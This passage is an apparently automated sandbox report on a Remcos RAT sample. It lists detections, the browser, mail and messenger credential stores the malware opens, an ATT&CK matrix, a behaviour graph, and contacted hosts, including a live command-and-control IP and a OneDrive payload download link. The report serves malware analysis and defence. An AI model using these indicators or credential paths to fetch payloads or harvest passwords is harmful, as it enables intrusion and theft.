                  Source: Yara matchFile source: 00000000.00000002.1733060343.000000007E790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000001.1882448821.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.1775014710.0000000024164000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4137990797.0000000000AC0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000001.1717466391.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: SHEOrder-10524.exe PID: 7276, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lhgtogaW.pif PID: 7432, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lhgtogaW.pif PID: 7868, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lhgtogaW.pif PID: 8068, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Contains functionality to steal Chrome passwords or cookies
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data4_2_0040BA12
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data4_1_0040BA12
                  Contains functionality to steal Firefox passwords or cookies
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\4_2_0040BB30
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: \key3.db4_2_0040BB30
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\4_1_0040BB30
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: \key3.db4_1_0040BB30
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Tries to steal Instant Messenger accounts or passwords
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                  Yara detected WebBrowserPassView password recovery tool
                  Source: Yara matchFile source: Process Memory Space: lhgtogaW.pif PID: 7432, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lhgtogaW.pif PID: 7548, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Detected Remcos RAT
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifMutex created: \Sessions\1\BaseNamedObjects\Rmc-V052BGJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifMutex created: \Sessions\1\BaseNamedObjects\Rmc-V052BGJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifMutex created: \Sessions\1\BaseNamedObjects\Rmc-V052BG
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 4.2.lhgtogaW.pif.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.lhgtogaW.pif.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4155660149.000000002416C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000001.1717466391.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4156653259.0000000025BBF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000001.1938580336.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4137990797.0000000000490000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000001.1938580336.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4155660149.000000002412E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1733060343.000000007E790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000001.1882448821.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.1775014710.0000000024164000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4137990797.0000000000AC0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000001.1717466391.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: SHEOrder-10524.exe PID: 7276, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lhgtogaW.pif PID: 7432, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lhgtogaW.pif PID: 7868, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lhgtogaW.pif PID: 8068, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: cmd.exe4_2_0040569A
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: cmd.exe4_1_0040569A

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		1
                  Valid Accounts                  		1
                  Native API                  		1
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		12
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Shared Modules                  		1
                  DLL Side-Loading                  		1
                  Bypass User Account Control                  		2
                  Obfuscated Files or Information                  		211
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		21
                  Encrypted Channel                  		Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts12
                  Command and Scripting Interpreter                  		1
                  Valid Accounts                  		1
                  Valid Accounts                  		2
                  Software Packing                  		1
                  Credentials in Registry                  		1
                  System Service Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Service Execution                  		1
                  Windows Service                  		11
                  Access Token Manipulation                  		1
                  Timestomp                  		3
                  Credentials In Files                  		1
                  System Network Connections Discovery                  		Distributed Component Object Model211
                  Input Capture                  		1
                  Remote Access Software                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Registry Run Keys / Startup Folder                  		1
                  Windows Service                  		1
                  DLL Side-Loading                  		LSA Secrets3
                  File and Directory Discovery                  		SSH3
                  Clipboard Data                  		2
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts522
                  Process Injection                  		1
                  Bypass User Account Control                  		Cached Domain Credentials48
                  System Information Discovery                  		VNCGUI Input Capture113
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                  Registry Run Keys / Startup Folder                  		11
                  Masquerading                  		DCSync1
                  Query Registry                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Valid Accounts                  		Proc Filesystem141
                  Security Software Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Virtualization/Sandbox Evasion                  		/etc/passwd and /etc/shadow1
                  Virtualization/Sandbox Evasion                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                  Access Token Manipulation                  		Network Sniffing4
                  Process Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd522
                  Process Injection                  		Input Capture1
                  Application Window Discovery                  		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled TaskEmbedded PayloadsKeylogging1
                  System Owner/User Discovery                  		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431184 Sample: SHEOrder-10524.exe Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 55 web.fe.1drv.com 2->55 57 sn-files.fe.1drv.com 2->57 59 5 other IPs or domains 2->59 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 Antivirus detection for URL or domain 2->67 69 13 other signatures 2->69 8 SHEOrder-10524.exe 1 7 2->8         started        13 Wagotghl.PIF 2->13         started        15 Wagotghl.PIF 2->15         started        signatures3 process4 dnsIp5 61 dual-spov-0006.spov-msedge.net 13.107.139.11, 443, 49730, 49731 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 8->61 43 C:\Users\Public\Libraries\netutils.dll, PE32+ 8->43 dropped 45 C:\Users\Public\Libraries\lhgtogaW.pif, PE32 8->45 dropped 47 C:\Users\Public\Libraries\easinvoker.exe, PE32+ 8->47 dropped 49 C:\Users\Public\Wagotghl.url, MS 8->49 dropped 81 Drops PE files with a suspicious file extension 8->81 83 Writes to foreign memory regions 8->83 85 Allocates memory in foreign processes 8->85 17 lhgtogaW.pif 3 16 8->17         started        22 extrac32.exe 1 8->22         started        24 cmd.exe 1 8->24         started        87 Multi AV Scanner detection for dropped file 13->87 89 Machine Learning detection for dropped file 13->89 91 Sample uses process hollowing technique 13->91 26 lhgtogaW.pif 13->26         started        28 lhgtogaW.pif 15->28         started        file6 signatures7 process8 dnsIp9 51 91.223.3.151, 4508, 49733, 49734 PL-SKYTECH-ASPL Poland 17->51 53 geoplugin.net 178.237.33.50, 49735, 80 ATOM86-ASATOM86NL Netherlands 17->53 39 C:\ProgramData\remcos\logs.dat, data 17->39 dropped 71 Contains functionality to bypass UAC (CMSTPLUA) 17->71 73 Detected unpacking (changes PE section rights) 17->73 75 Detected Remcos RAT 17->75 79 9 other signatures 17->79 30 lhgtogaW.pif 1 17->30         started        33 lhgtogaW.pif 1 17->33         started        35 lhgtogaW.pif 2 17->35         started        41 C:\Users\Public\Libraries\Wagotghl.PIF, PE32 22->41 dropped 77 Drops PE files with a suspicious file extension 22->77 37 conhost.exe 24->37         started        file10 signatures11 process12 signatures13 93 Tries to steal Instant Messenger accounts or passwords 30->93 95 Tries to steal Mail credentials (via file / registry access) 30->95 97 Tries to harvest and steal browser information (history, passwords, etc) 33->97

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  SHEOrder-10524.exe47%ReversingLabsWin32.Backdoor.Remcos
                  SHEOrder-10524.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\Public\Libraries\Wagotghl.PIF100%Joe Sandbox ML
                  C:\Users\Public\Libraries\Wagotghl.PIF47%ReversingLabsWin32.Backdoor.Remcos
                  C:\Users\Public\Libraries\easinvoker.exe0%ReversingLabs
                  C:\Users\Public\Libraries\lhgtogaW.pif3%ReversingLabs
                  C:\Users\Public\Libraries\netutils.dll29%ReversingLabsWin64.Trojan.Zusy

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.imvu.comr0%URL Reputationsafe
                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                  http://ocsp.sectigo.com00%URL Reputationsafe
                  https://aefd.nelreports.net/api/report?cat=bingth0%URL Reputationsafe
                  http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#0%URL Reputationsafe
                  https://aefd.nelreports.net/api/report?cat=bingaotak0%URL Reputationsafe
                  https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                  http://geoplugin.net/json.gp/C100%URL Reputationphishing
                  https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat0%URL Reputationsafe
                  http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl00%URL Reputationsafe
                  https://sectigo.com/CPS00%URL Reputationsafe
                  https://aefd.nelreports.net/api/report?cat=wsb0%URL Reputationsafe
                  http://geoplugin.net/json.gp100%URL Reputationphishing
                  https://aefd.nelreports.net/api/report?cat=bingaot0%URL Reputationsafe
                  https://aefd.nelreports.net/api/report?cat=bingrms0%URL Reputationsafe
                  http://ocsp.sectigo.com0C0%URL Reputationsafe
                  http://www.ebuddy.com0%URL Reputationsafe
                  http://www.imvu.comta0%Avira URL Cloudsafe
                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                  https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e7420%Avira URL Cloudsafe
                  http://geoplugin.net/json.gpZ0%Avira URL Cloudsafe
                  http://geoplugin.net/json.gpH0%Avira URL Cloudsafe
                  https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c0%Avira URL Cloudsafe
                  https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc80%Avira URL Cloudsafe
                  https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d0%Avira URL Cloudsafe
                  https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc0%Avira URL Cloudsafe
                  https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf680%Avira URL Cloudsafe
                  https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d7888073423260%Avira URL Cloudsafe
                  https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa4370%Avira URL Cloudsafe
                  91.223.3.1510%Avira URL Cloudsafe
                  http://geoplugin.net/json.gpu0%Avira URL Cloudsafe
                  https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad70%Avira URL Cloudsafe
                  https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b030%Avira URL Cloudsafe
                  https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d50%Avira URL Cloudsafe
                  https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  dual-spov-0006.spov-msedge.net
                  		13.107.139.11
                  		truefalse
                    		unknown
                    geoplugin.net
                    		178.237.33.50
                    		truefalse
                      		unknown
                      onedrive.live.com
                      		unknown
                      		unknownfalse
                        		high
                        bnaqzw.sn.files.1drv.com
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://onedrive.live.com/download?resid=B24528E77689F9AC%21162&authkey=!APfH4vXvDJEK1Qcfalse
                            		high
                            91.223.3.151true
                            • Avira URL Cloud: safe
                            		unknown
                            http://geoplugin.net/json.gptrue
                            • URL Reputation: phishing
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.imvu.comrlhgtogaW.pif, 00000004.00000002.4157153882.0000000027490000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://ocsp.sectigo.com0SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=Wbhv1938.tmp.5.drfalse
                              		high
                              http://www.imvu.comtalhgtogaW.pif, 00000007.00000003.1781518005.000000000091D000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000007.00000003.1781576573.000000000091D000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbadbhv1938.tmp.5.drfalse
                                		high
                                https://aefd.nelreports.net/api/report?cat=bingthbhv1938.tmp.5.drfalse
                                • URL Reputation: safe
                                		unknown
                                http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fccbhv1938.tmp.5.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.nirsoft.netlhgtogaW.pif, 00000005.00000002.1794411249.0000000000193000.00000004.00000010.00020000.00000000.sdmpfalse
                                  		high
                                  https://aefd.nelreports.net/api/report?cat=bingaotakbhv1938.tmp.5.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://deff.nelreports.net/api/report?cat=msnbhv1938.tmp.5.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Frbhv1938.tmp.5.drfalse
                                    		high
                                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742bhv1938.tmp.5.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Frbhv1938.tmp.5.drfalse
                                      		high
                                      http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comlhgtogaW.pif, 00000004.00000002.4157153882.0000000027490000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51bhv1938.tmp.5.drfalse
                                        		high
                                        https://onedrive.live.com/SHEOrder-10524.exe, 00000000.00000002.1719110416.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 00000008.00000002.1884851023.000000000088E000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 00000008.00000003.1882438284.000000000086A000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 0000000B.00000003.1938923041.0000000000636000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.comlhgtogaW.pif, 00000004.00000002.4157153882.0000000027490000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                            		high
                                            https://bnaqzw.sn.files.1drv.com/y4mjSrmVGqdqL8hnH_btf-6Qys453bsv2FyIiEEOlZHaw9haei9AHV5FIa03OCcOV-qWagotghl.PIF, 0000000B.00000002.1940504493.0000000000662000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950cbhv1938.tmp.5.drfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://geoplugin.net/json.gpHlhgtogaW.pif, 00000004.00000002.4155660149.000000002416C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1795167395.000000002416B000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1777938226.000000002415C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1797585028.000000002416B000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1752093906.000000002416C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1796644094.000000002416B000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1775014710.0000000024164000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
